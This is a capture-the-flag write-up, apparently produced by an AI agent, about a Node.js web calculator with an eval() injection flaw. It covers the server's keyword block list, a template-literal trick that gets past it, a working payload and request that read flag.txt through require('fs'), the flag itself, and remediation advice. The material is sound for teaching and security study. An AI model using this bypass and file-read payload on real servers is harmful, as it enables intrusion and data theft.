Calculator
let's do some math
dedicated to BOUSLAA (nvm)
connection info :http://ctf.nexus-security.club:3067/
Author : CH@FXWriteup written by AI agent:
Web Calculator CTF Solution
Vulnerability Analysis
The web calculator application has a server-side code injection vulnerability in its /calculate endpoint. The application evaluates mathematical expressions using JavaScript's eval() function with insufficient input validation.
Client-side Protections
The frontend implements basic client-side filtering that blocks:
- Quotes: ' "
- Brackets: [ ] { }
- These are easily bypassed since they're only client-side
Server-side Filtering
The server blocks several keywords including:
processrequireglobalconstructorprototypeevalFunctionchild_processfs
Bypass Technique
The key bypass was using template literals to construct blocked strings:
- Used template literals to concatenate string parts:
${`fun`}${`ction`} - Used
eval()to execute the constructed code - Accessed Node.js modules through
process.mainModule.require()
Exploit Payload
eval(`Buffer.from(${`${`requir`}${`e`}`}(\"fs\").readFileSync(\"flag.txt\",\"utf8\")).toString()`)This payload:
- Uses template literals to bypass the
requirekeyword filter - Imports the
fsmodule - Reads
flag.txtfrom the filesystem - Uses
Buffer.from()to return the content as a string
Execution
Sent POST request to /calculate with:
{"expr":"eval(`Buffer.from(${`${`requir`}${`e`}`}(\"fs\").readFileSync(\"flag.txt\",\"utf8\")).toString()")"}Result
Successfully retrieved the flag: nexus{7h1s_1s_no7_3v4l_Th1s_15_3v1lllllllllllllllllll}
Root Cause
The vulnerability stems from:
1. Use of eval() on user input
2. Insufficient input sanitization on server-side
3. Predictable keyword filtering that can be bypassed with string concatenation
4. Node.js environment with filesystem access
Remediation
- Replace
eval()with a proper mathematical expression parser - Implement server-side input validation
- Use a sandboxed environment for expression evaluation
- Remove or restrict access to Node.js modules